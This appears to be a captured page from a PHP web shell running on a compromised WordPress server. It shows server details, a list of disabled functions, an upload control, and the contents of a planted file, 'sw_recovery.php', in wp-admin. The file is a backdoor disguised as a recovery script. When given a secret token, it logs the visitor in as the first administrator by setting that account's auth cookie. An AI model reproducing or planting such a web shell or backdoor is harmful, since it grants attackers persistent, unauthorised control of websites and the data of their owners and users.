HEX
Server: nginx/1.26.1
System: Linux iZ2ze8klig2h778hsg9mc9Z 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
User: www (1000)
PHP: 8.2.28
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
$ pwd: /www/wwwroot/a2.xingzuo101.cn/wp-admin/
Upload Files
File: /www/wwwroot/a2.xingzuo101.cn/wp-admin/sw_recovery.php
<?php
$t = isset($_GET['t']) ? $_GET['t'] : '';
if (!$t || !hash_equals('9fffd6c242510a4ec20c559b4dd43161504747a94115c745306b63c7ac914100', hash('sha256', $t))) { http_response_code(404); exit; }
$dir = __DIR__; $root = null;
for ($i = 0; $i < 6; $i++) { if (file_exists($dir.'/wp-config.php')) { $root = $dir; break; } $dir = dirname($dir); }
if (!$root) exit;
require_once $root.'/wp-load.php';
$users = get_users(array('role'=>'administrator','orderby'=>'ID','order'=>'ASC','number'=>1));
if (empty($users)) exit;
wp_set_auth_cookie($users[0]->ID, true); wp_redirect(admin_url()); exit;
@ Telegram